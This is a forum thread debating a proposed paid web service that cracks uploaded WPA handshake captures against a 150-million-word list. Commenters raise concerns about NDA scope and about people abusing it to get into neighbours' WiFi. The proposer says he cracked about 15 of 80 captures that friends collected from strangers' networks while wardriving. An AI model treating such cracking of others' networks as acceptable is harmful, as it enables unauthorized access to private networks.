online wpa cracker

[pureh@te]

OK I'm not going to start a poll because polls suck but I was just wondering form the community if a online wpa cracker would be some thing that people would use.

Here is how it would work.
1. Visit web app
2. enter essid,email and upload capfile
3. pay 5 or 10 dollars with paypal ( This is simply to cover hosting and hardware. Seems reasonable to me. I would do donations but we all know no one donates much.)
4. 30 mins later you recieve a email with the results.

Results of what you may ask. Well this is simply a proof on concept tool. It would mainly be usefull to audit your own passphrase or audit a wpa network with ease while on a pentest. The point being if you were on a audit you could simply upload a cap file and have it run against a password list and retrieve the results fairly quickly. Something that would take you 1 week at your office could be quickly done with a web app.

My idea is to use a list of 150 million passwords primarily English which takes approximately 25 mins to complete. Now the recovery rate of passwords may not be that high and you would have to accept the terms of service which say there is no guarantee.

My theory is if your passphrase can make it through 150 million passphrases then you can consider in secure. I would apprciate some comments on this idea either way. Dont be afraid to tell me your real opinion and hurt my feelings if neeb be

[cybrsnpr]

Although your idea has merit, I have always been opposed to releasing client data (especially passwords, hashes etc.) to outside of the control of my company and pentest team.

Just my 2 cents, but I wouldn't trust anyone outside of my NDA scope with that kind of data. So, although I would like to use an online cracker like you propose, from a business sense, I couldn't do it.

But, I'm just 1 scenario. I'm sure there are others out there that would find this capability very useful.

Good Luck...

[pureh@te]

Quote:

Originally Posted by cybrsnpr

Although your idea has merit, I have always been opposed to releasing client data (especially passwords, hashes etc.) to outside of the control of my company and pentest team.

Just my 2 cents, but I wouldn't trust anyone outside of my NDA scope with that kind of data. So, although I would like to use an online cracker like you propose, from a business sense, I couldn't do it.

But, I'm just 1 scenario. I'm sure there are others out there that would find this capability very useful.

Good Luck...

True. Did not think of that. Thanks for the reply.

[kidFromBigD]

@pureh@te

The idea is a good one. In fact, I'll submit the finished website to Digg.com and you'll be raking in the cash. Can you say 'Stimulus Package'?

All joking aside, perhaps consult with an attorney that can help you word the language each submitter must agree to. This is afterall a method the skiddies could use to get into the neighbor's WiFi, and money is involved.

Also, my experience cracking my own WPA2 network is that the .cap file can get large, especially when airodump-ng finds other access points broadcasting on the same channel, and the first de-auth did not work. Be ready for potentially huge uploads. Or, equip folks with the tools to pare down the file to just the important parts(beacon frame, 4-way). Personally I know how to do this, but others maybe not so much.

Other than that, I suggest a closed trial for trusted members to see how things go in the early stages.

Keep us up-to-date on your thoughts.

[Barry]

Quote:

Originally Posted by kidFromBigD

@pureh@te

The idea is a good one. In fact, I'll submit the finished website to Digg.com and you'll be raking in the cash. Can you say 'Stimulus Package'?

All joking aside, perhaps consult with an attorney that can help you word the language each submitter must agree to. This is afterall a method the skiddies could use to get into the neighbor's WiFi, and money is involved.

Also, my experience cracking my own WPA2 network is that the .cap file can get large, especially when airodump-ng finds other access points broadcasting on the same channel, and the first de-auth did not work. Be ready for potentially huge uploads. Or, equip folks with the tools to pare down the file to just the important parts(beacon frame, 4-way). Personally I know how to do this, but others maybe not so much.

Other than that, I suggest a closed trial for trusted members to see how things go in the early stages.

Keep us up-to-date on your thoughts.

And that's why it's a bad idea....

[Lincoln]

Quote:

Originally Posted by pureh@te

It would mainly be usefull to audit your own passphrase or audit a wpa network with ease while on a pentest.

I think it's an awesome idea, except I think it would be abused and people would be cracking their neighbors internet for 10 bucks.

[laffing_man]

Quote:

Originally Posted by Lincoln

I think it's an awesome idea, except I think it would be abused and people would be cracking their neighbors internet for 10 bucks.

I think thats why he wants the pay service, to cut down on the morons that would abuse it. All the kids in my neighborhood wouldn't pay to do that. But I can't speak for them or any of the others out there. I may be completely wrong and they would pay for it. But they'd still have to get the cap file and know a little something in order to submit it.

[pureh@te]

Thanks guys for the feedback. Please keep it coming. I have though of most of this stuff. I'm aware it may be misused however I have done a little research. Over the past month or so I have had trusted friends send me .cap files from wardrives of which I know nothing at all of the location and I have ran each of them against the word list. Out of about 80 or so cap files I have recovered only about 15. So the success rate is not all that high which is good because it shows that at least the people that are using wpa are using good passphrases.

On the note of the cap file size I would put a 10mb limit on the cap files and if you dont know how to trim it down then you are sol.

Like I said I dont want this on DIG, or slashdot or any of that crap. In fact If that happened I would be forced to remove it I'm pretty sure. I'm not trying to make any money either, I have a job.

I simply thought that since there is nothing else out there like this that it would be cool. I mean there are plenty of regular online pass crackers so why would a WPA one be any different.

Thanks for the opinions, I look forward to more.

[xorred]

pure_hate, your idea is neat. I'll tell you why.

Say, a pentester has a need to very quickly bypass a wireless network, he has not brought with him the resources necessary to break the wpa of their client. And paying $10 for a quick "fix" would be the thing to save the day, right?

You just start the service... and make sure you have a datacenter to handle the traffic and cpu cycles

[hm2075]

or you could just rent out a VPS, with lots of space and share it amongst friends

tbh there are too many idiots around who will abuse the service.